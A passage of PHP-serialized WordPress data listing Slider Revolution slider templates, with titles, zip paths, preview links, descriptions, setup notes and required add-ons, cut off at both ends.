Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:128;a:25:{s:2:\"id\";s:3:\"130\";s:5:\"title\";s:25:\"Nice And Clean TextBlocks\";s:5:\"alias\";s:23:\"niceandclean_textblocks\";s:3:\"zip\";s:33:\"packs/niceandclean_textblocks.zip\";s:3:\"uid\";s:32:\"1f33eb839c96ea3225faff1c8d382b05\";s:3:\"img\";s:34:\"niceandclean_textblocks/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:129;a:25:{s:2:\"id\";s:3:\"131\";s:5:\"title\";s:22:\"Nice And Clean CallOut\";s:5:\"alias\";s:20:\"niceandclean_callout\";s:3:\"zip\";s:30:\"packs/niceandclean_callout.zip\";s:3:\"uid\";s:32:\"54d4d9bcf79d357de0e614700e909863\";s:3:\"img\";s:31:\"niceandclean_callout/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"500\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:130;a:25:{s:2:\"id\";s:3:\"132\";s:5:\"title\";s:21:\"Nice And Clean Footer\";s:5:\"alias\";s:19:\"niceandclean_footer\";s:3:\"zip\";s:29:\"packs/niceandclean_footer.zip\";s:3:\"uid\";s:32:\"5492d7f72b3771a4e754f91bda063b15\";s:3:\"img\";s:30:\"niceandclean_footer/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"400\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:542:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">For using the social sharing buttons, please install the social sharing add-on.<br><br></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:131;a:22:{s:2:\"id\";s:3:\"134\";s:5:\"title\";s:15:\"80s Style Intro\";s:5:\"alias\";s:3:\"80s\";s:3:\"zip\";s:7:\"80s.zip\";s:3:\"uid\";s:32:\"98881ab51f71b2fbdb220752d321b15a\";s:3:\"img\";s:14:\"80s/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/80s-style-intro/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:139:\"<span class=\"ttm_content\">This intro hero block takes you back to the 80\'s with some funky effects.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:317:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and text.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:132;a:22:{s:2:\"id\";s:3:\"135\";s:5:\"title\";s:18:\"Blur Effect Slider\";s:5:\"alias\";s:10:\"blurslider\";s:3:\"zip\";s:14:\"blurslider.zip\";s:3:\"uid\";s:32:\"83bd6e1ccef83f03c944fa05b0a2d879\";s:3:\"img\";s:21:\"blurslider/slide1.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/blur-effect-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:147:\"<span class=\"ttm_content\">This slider makes use of the brand new blur effects available with version 5.3.1.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:315:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change the background images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:133;a:22:{s:2:\"id\";s:3:\"136\";s:5:\"title\";s:18:\"Coming Soon Add-On\";s:5:\"alias\";s:15:\"ComingSoonAddon\";s:3:\"zip\";s:19:\"ComingSoonAddon.zip\";s:3:\"uid\";s:32:\"51258492055b940099eb96ba52901fa9\";s:3:\"img\";s:26:\"ComingSoonAddon/slide1.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/coming-soon-add-on/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:133:\"<span class=\"ttm_content\">This slider template makes use of the brand new Coming Soon Add-On.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:197:\"[{\"path\":\"revslider-maintenance-addon\\/revslider-maintenance-addon.php\",\"name\":\"Coming Soon & Maintenance AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/add-coming-soon-maintenance\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:134;a:25:{s:2:\"id\";s:3:\"137\";s:5:\"title\";s:22:\"Nice And Clean Package\";s:5:\"alias\";s:22:\"nice-and-clean-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:22:\"nice-and-clean-package\";s:3:\"img\";s:38:\"packages/templatepack_niceandclean.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:242:\"<span class=\"ttm_content\">The Nice & Clean Website Template uses groups & rows for a fully responsive website experience. Elegant blur effects available since version 5.3.1 make this template stand out!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:135;a:22:{s:2:\"id\";s:3:\"138\";s:5:\"title\";s:18:\"Snow Effect Add-On\";s:5:\"alias\";s:9:\"snowaddon\";s:3:\"zip\";s:13:\"snowaddon.zip\";s:3:\"uid\";s:32:\"7408d8567b8af5716eaabd390422e51b\";s:3:\"img\";s:20:\"snowaddon/slide1.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/snow-effect-add-on/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:183:\"<span class=\"ttm_content\">Add a pleasant Snow Effect to your website with this slider template. Make sure to install the \"Holiday Snow\" Add-On.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:153:\"[{\"path\":\"revslider-snow-addon\\/revslider-snow-addon.php\",\"name\":\"Snow AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:136;a:22:{s:2:\"id\";s:3:\"139\";s:5:\"title\";s:19:\"Particle Effect One\";s:5:\"alias\";s:19:\"particle-effect-one\";s:3:\"zip\";s:23:\"particle-effect-one.zip\";s:3:\"uid\";s:32:\"a4611c906e35ca60f617da86217b5299\";s:3:\"img\";s:30:\"particle-effect-one/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/particle-effect-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:143:\"<span class=\"ttm_content\">A unique particle effect that can serve as a stunning intro for your website.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:442:\"<span class=\"ttm_content\">The blend mode effect is achieved through a layer image with CSS blend mode. If you want to customize this effect, select the \"BLEND MODE IMAGE\" layer and go to \"advanced style -> filters -> blend mode\".</span>\r\n<span class=\"ttm_space\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:137;a:22:{s:2:\"id\";s:3:\"140\";s:5:\"title\";s:19:\"Particle Effect Two\";s:5:\"alias\";s:19:\"particle-effect-two\";s:3:\"zip\";s:23:\"particle-effect-two.zip\";s:3:\"uid\";s:32:\"b8ecbf43374a69e4ab329ea834862ef8\";s:3:\"img\";s:30:\"particle-effect-two/slide1.jpg\";s:7:\"preview\";s:56:\"https://revolution.themepunch.com/particle-effect-intro/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:143:\"<span class=\"ttm_content\">A unique particle effect that can serve as a stunning intro for your website.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:138;a:22:{s:2:\"id\";s:3:\"141\";s:5:\"title\";s:21:\"Particle Effect Three\";s:5:\"alias\";s:21:\"particle-effect-three\";s:3:\"zip\";s:25:\"particle-effect-three.zip\";s:3:\"uid\";s:32:\"b33bc2c5655d8d51cd17c3740f72e748\";s:3:\"img\";s:32:\"particle-effect-three/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/particle-background-effect/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:143:\"<span class=\"ttm_content\">A unique particle effect that can serve as a stunning intro for your website.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:437:\"<span class=\"ttm_content\">The blend mode effect is achieved through a layer image with CSS blend mode. If you want to customize this effect, select the \"BLEND IMAGE\" layer and go to \"advanced style -> filters -> blend mode\".</span>\r\n<span class=\"ttm_space\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:139;a:22:{s:2:\"id\";s:3:\"142\";s:5:\"title\";s:16:\"Portfolio Viewer\";s:5:\"alias\";s:15:\"portfolioviewer\";s:3:\"zip\";s:19:\"portfolioviewer.zip\";s:3:\"uid\";s:32:\"9ac7230ff5b880fb6c8f28fbbc123b3b\";s:3:\"img\";s:26:\"portfolioviewer/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/wordpress-portfolio-plugin/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:207:\"<span class=\"ttm_content\">This slider template can be used to display your portfolio highlights in a stunning way, utilising out free particles add-on and blend modes.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:387:\"<span class=\"ttm_content\">The navigation for the slides is found in the <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">Static Layers</a>.</span><span class=\"ttm_space\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:140;a:22:{s:2:\"id\";s:3:\"143\";s:5:\"title\";s:12:\"App Showcase\";s:5:\"alias\";s:11:\"appshowcase\";s:3:\"zip\";s:15:\"appshowcase.zip\";s:3:\"uid\";s:32:\"082aef931b0369080bc30c3a2a0c331f\";s:3:\"img\";s:22:\"appshowcase/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/app-showcase-wordpress-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:239:\"<span class=\"ttm_content\">This template shows off our new \"Polyfold Effects\" Add-On in form of an App product showcase module. Get started now and illustrate your Apps key features in a striking way!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:179:\"[{\"path\":\"revslider-polyfold-addon\\/revslider-polyfold-addon.php\",\"name\":\"Polyfold Scroll Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:141;a:22:{s:2:\"id\";s:3:\"144\";s:5:\"title\";s:19:\"Gravity Design Hero\";s:5:\"alias\";s:13:\"gravitydesign\";s:3:\"zip\";s:17:\"gravitydesign.zip\";s:3:\"uid\";s:32:\"7bdbe73a6e5bf290cb4412708ac4134d\";s:3:\"img\";s:24:\"gravitydesign/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/best-wordpress-slider-plugin-2017/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:205:\"<span class=\"ttm_content\">This hero template shows a striking mouse-parallax scene and cool particle effects. Requires our \"Particle Effects\" Add-on to be installed.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:142;a:22:{s:2:\"id\";s:3:\"145\";s:5:\"title\";s:14:\"404 Error Page\";s:5:\"alias\";s:12:\"404errorpage\";s:3:\"zip\";s:16:\"404errorpage.zip\";s:3:\"uid\";s:32:\"2dc62d802b42b73088651cac17d0c486\";s:3:\"img\";s:23:\"404errorpage/slide1.jpg\";s:7:\"preview\";s:58:\"https://revolution.themepunch.com/404-error-page-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:227:\"<span class=\"ttm_content\">This template can be used as a custom error page on your website with our new 404 page Add-On. Of course you can also use this template as a regular hero header.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:330:\"[{\"path\":\"revslider-404-addon\\/revslider-404-addon.php\",\"name\":\"404 Page Add-On\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"},{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:143;a:22:{s:2:\"id\";s:3:\"146\";s:5:\"title\";s:16:\"Carousel Gallery\";s:5:\"alias\";s:15:\"carouselgallery\";s:3:\"zip\";s:19:\"carouselgallery.zip\";s:3:\"uid\";s:32:\"041838fd32923c40e15c998f0ea19526\";s:3:\"img\";s:26:\"carouselgallery/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/wordpress-carousel-gallery/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.4\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:159:\"<span class=\"ttm_content\">This carousel gallery features a subtle parallax effect, html5 video and a fullscreen button.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:144;a:22:{s:2:\"id\";s:3:\"147\";s:5:\"title\";s:16:\"Filmstrip Effect\";s:5:\"alias\";s:9:\"filmstrip\";s:3:\"zip\";s:13:\"filmstrip.zip\";s:3:\"uid\";s:32:\"7bd142f272cc15d86998a79520e9e581\";s:3:\"img\";s:20:\"filmstrip/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/filmstrip-add-on-slider/ \";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:241:\"<span class=\"ttm_content\">This template uses our Filmstrip Add-On to display a continuous scrolling set of images per slide.\r\n There is lots of customization options like animation speed and direction.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:180:\"[{\"path\":\"revslider-filmstrip-addon\\/revslider-filmstrip-addon.php\",\"name\":\"Background FilmStrip Add-On\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:145;a:22:{s:2:\"id\";s:3:\"148\";s:5:\"title\";s:11:\"Space Opera\";s:5:\"alias\";s:10:\"spaceopera\";s:3:\"zip\";s:14:\"spaceopera.zip\";s:3:\"uid\";s:32:\"a2c8bffcb138a86c0f373adebb6de046\";s:3:\"img\";s:21:\"spaceopera/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/space-opera-presentation/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.4\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:201:\"<span class=\"ttm_content\">The Space Opera template can be enjoyed as a slow paced, full-screen slider experience and is great to show your most prominent photos.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:146;a:22:{s:2:\"id\";s:3:\"149\";s:5:\"title\";s:13:\"Website Intro\";s:5:\"alias\";s:12:\"websiteintro\";s:3:\"zip\";s:16:\"websiteintro.zip\";s:3:\"uid\";s:32:\"348df76d999456aa19be58c9df56ae20\";s:3:\"img\";s:23:\"websiteintro/slide1.jpg\";s:7:\"preview\";s:65:\"https://revolution.themepunch.com/website-intro-wordpress-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.4\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:274:\"<span class=\"ttm_content\">Making use of our new Slicey Add-On, this slider show a really cool effect you just have to experience yourself! Just change the slides background images and the existing slices will automatically be applied.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a 